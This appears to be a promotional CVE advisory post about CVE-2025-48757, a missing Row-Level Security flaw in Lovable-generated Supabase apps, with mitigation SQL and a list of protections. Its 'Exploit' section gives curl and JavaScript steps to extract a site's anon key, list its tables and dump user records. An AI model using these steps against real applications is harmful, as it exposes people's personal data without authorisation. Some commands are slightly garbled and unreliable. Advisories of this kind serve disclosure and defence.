Listen to this Post
CVE-2025-48757 is a critical insufficient Row-Level Security (RLS) policy vulnerability in Lovable-generated Supabase applications, allowing remote unauthenticated attackers to read or write arbitrary database tables. The flaw arises because Lovable’s AI scaffolding often creates Supabase tables without enabling RLS or with permissive policies, leaving the `anon` key capable of full table access. Attackers can enumerate exposed tables via the Supabase REST API, extract sensitive data such as API keys, email addresses, and user records, or inject malicious rows. The vulnerability affects any Lovable project created through 2025-04-15 that uses Supabase as its backend. Exploitation requires only the public anon key, which is embedded in client-side JavaScript by default. Detection involves analyzing the Supabase endpoint for permissive RLS policies or using the Supabase client to test unauthorized access. The root cause is a combination of AI-generated code lacking security guardrails and developers not auditing the generated database schemas. Over 170 applications were initially identified as exposed. The vulnerability is classified as critical because it enables full database compromise without authentication. Mitigation requires manually enabling RLS on all tables and defining strict policies. The CVE highlights the risks of AI-assisted development when security best practices are omitted. Patching involves updating the Supabase schema and reviewing all table policies. The vulnerability was disclosed in May 2025 and remains a significant threat to AI-coded applications. Regular security audits of Supabase projects are essential to prevent similar exposures.
DailyCVE Form:
Platform: Lovable
Version: Through 2025-04-15
Vulnerability: RLS bypass
Severity: Critical
date: 2025-05-30
Prediction: 2025-06-15
What Undercode Say:
Analytics:
curl -X GET "https://<project-ref>.supabase.co/rest/v1/users?select=" \ -H "apikey: <anon-key>" \ -H "Authorization: Bearer <anon-key>"
const { createClient } = require('@supabase/supabase-js');
const supabase = createClient('https://<project-ref>.supabase.co', '<anon-key>');
const { data, error } = await supabase.from('users').select('');
console.log(data);
-- Check RLS status SELECT schemaname, tablename, rowsecurity FROM pg_tables WHERE schemaname = 'public'; -- Enable RLS ALTER TABLE public.users ENABLE ROW LEVEL SECURITY; -- Create policy CREATE POLICY "Allow authenticated read" ON public.users FOR SELECT USING (auth.role() = 'authenticated');
Exploit: (Educational Purposes!)
Step 1: Extract anon key from client-side JS curl -s https://target-lovable-app.com | grep -o 'eyJ[a-zA-Z0-9_-].[a-zA-Z0-9_-].[a-zA-Z0-9_-]' Step 2: List all tables via Supabase REST curl -s "https://<project-ref>.supabase.co/rest/v1/" \ -H "apikey: <anon-key>" \ -H "Authorization: Bearer <anon-key>" Step 3: Dump sensitive table curl -s "https://<project-ref>.supabase.co/rest/v1/users?select=" \ -H "apikey: <anon-key>" \ -H "Authorization: Bearer <anon-key>"
Protection: from this CVE
- Enable Row-Level Security on all Supabase tables.
- Define explicit RLS policies for each table (e.g.,
auth.uid() = user_id). - Never expose the `service_role` key in client-side code.
- Use the Supabase dashboard to audit RLS status regularly.
- Implement a CI/CD check that verifies RLS is enabled before deployment.
- Restrict the `anon` role to only necessary operations.
- Monitor Supabase logs for unusual REST API queries.
Impact:
- Unauthenticated attackers can read, modify, or delete any data in exposed tables.
- Sensitive information such as API keys, emails, and personal data may leak.
- Attackers can inject malicious records or escalate privileges within the application.
- Over 170 applications were confirmed vulnerable, affecting thousands of users.
- The vulnerability undermines trust in AI-generated code and requires costly remediation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

